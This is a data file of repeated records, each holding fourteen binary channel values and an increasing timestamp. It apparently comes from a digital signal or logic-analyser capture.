0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9260112e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9260136e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9260140e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9260188e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9260212e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9260236e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9260260e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9260268e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9260284e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9260308e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9260336e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9260364e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9260388e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9260412e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9260436e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9260460e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9260484e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9260512e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9260564e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9260588e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,1.9260592e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9260596e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9260612e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9260636e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9260660e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9260684e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9260712e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9260736e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9260760e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9260788e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9260812e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9260836e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9260860e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9260884e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9260908e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9260936e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9260964e-02 0,1,0,0,0,0,0,0,0,1,0,0,0,0,1.9260988e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9260992e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9261012e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9261036e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9261084e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9261112e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9261132e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9261164e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9261188e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9261208e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9261236e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9261260e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,1.9261264e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9261268e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9261308e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9261332e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9261356e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9261388e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9261408e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9261436e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9261460e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9261484e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9261508e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9261532e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9261584e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9261608e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9261612e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9261660e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9261684e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9261692e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9261708e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9261732e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9261756e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9261784e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9261808e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9261836e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9261860e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9261884e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9261908e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9261932e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9261956e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9261984e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262008e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262036e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262060e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262084e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262108e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262132e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262156e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262184e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262208e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262236e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262260e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262284e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262308e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262332e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262356e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262384e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262408e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262432e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262456e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9262484e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9262532e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9262556e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262564e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262580e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262604e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262632e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262656e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262684e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262708e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262732e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262756e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262780e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262804e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262832e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262856e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262884e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262908e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9262932e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9262956e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9262960e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9262980e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9263004e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9263056e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9263084e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,1.9263088e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9263092e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9263108e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9263132e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9263156e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9263180e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9263204e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9263232e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9263256e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9263284e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9263308e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9263332e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9263356e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9263380e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9263432e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9263456e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9263484e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9263508e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9263532e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9263556e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9263564e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9263580e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9263604e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9263632e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9263656e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9263684e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9263708e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9263732e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9263756e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9263780e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9263804e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9263832e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9263856e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9263880e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9263908e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9263932e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9263956e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9263960e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9264004e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9264032e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,1.9264036e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9264040e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9264056e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9264084e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9264108e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9264132e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9264164e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9264188e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9264212e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9264236e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9264260e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9264284e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9264312e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9264336e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9264340e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9264360e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9264388e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9264412e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9264436e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9264460e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9264484e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9264508e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9264536e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9264564e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9264588e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9264636e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9264660e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9264668e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9264684e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9264712e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9264736e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9264764e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9264788e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9264812e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9264836e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9264860e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9264884e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9264912e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9264936e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9264960e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9264988e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265012e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265036e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265060e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265084e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265108e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265136e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265164e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265188e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265212e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265236e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265260e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265284e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265312e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265336e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265364e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265388e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265412e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265436e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265460e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265484e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265512e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265536e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265564e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265588e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265612e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265636e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265660e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265684e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265708e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265736e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265764e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265788e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265812e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9265836e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9265860e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,1,1.9390440e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.9390636e-02 1,1,0,0,0,0,0,0,0,0,0,1,0,1,1.9390668e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.9390692e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,1.9390980e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.9391004e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,1.9391024e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.9391052e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,1.9391076e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.9391100e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,1.9391124e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.9391148e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,1.9391200e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.9391224e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,1,1.9391228e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,1,1.9391248e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9391276e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,1.9391280e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9391284e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9391300e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9391324e-02 1,1,0,0,0,0,0,0,0,1,0,0,0,0,1.9391328e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9391332e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9391372e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9391400e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,1.9391404e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9391408e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9391424e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9391448e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9391476e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9391500e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9391524e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9391548e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9391572e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9391596e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9391624e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9391648e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9391676e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9391700e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9391704e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9391748e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9391772e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9391780e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9391800e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9391824e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9391848e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9391876e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9391900e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9391924e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9391948e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9391972e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9391980e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9391996e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9392024e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,1.9392028e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392032e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392048e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392076e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392100e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392124e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392148e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392172e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392196e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392224e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392244e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392276e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392324e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392348e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9392352e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9392372e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9392396e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392404e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392420e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392444e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392472e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392500e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392524e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392548e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392572e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392596e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392620e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392644e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392672e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392700e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392724e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392748e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392772e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392796e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392820e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392844e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9392852e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9392900e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9392924e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392932e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392948e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9392972e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9392996e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393020e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9393044e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393072e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9393076e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9393124e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9393148e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393156e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9393172e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393196e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9393220e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393244e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9393272e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393296e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9393348e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393372e-02 1,1,0,0,0,0,0,0,0,1,0,0,0,0,1.9393376e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9393380e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9393396e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9393420e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9393472e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9393496e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393504e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9393524e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393548e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9393572e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393596e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9393620e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393644e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9393672e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393696e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9393724e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393748e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9393772e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393796e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9393820e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393844e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9393872e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393896e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9393924e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393948e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9393972e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9393996e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394020e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394044e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394072e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394096e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394124e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394148e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394172e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394196e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394220e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394244e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394272e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394296e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9394300e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9394348e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9394372e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394380e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394396e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394420e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394444e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394472e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394496e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394524e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394548e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394572e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394596e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394620e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394644e-02 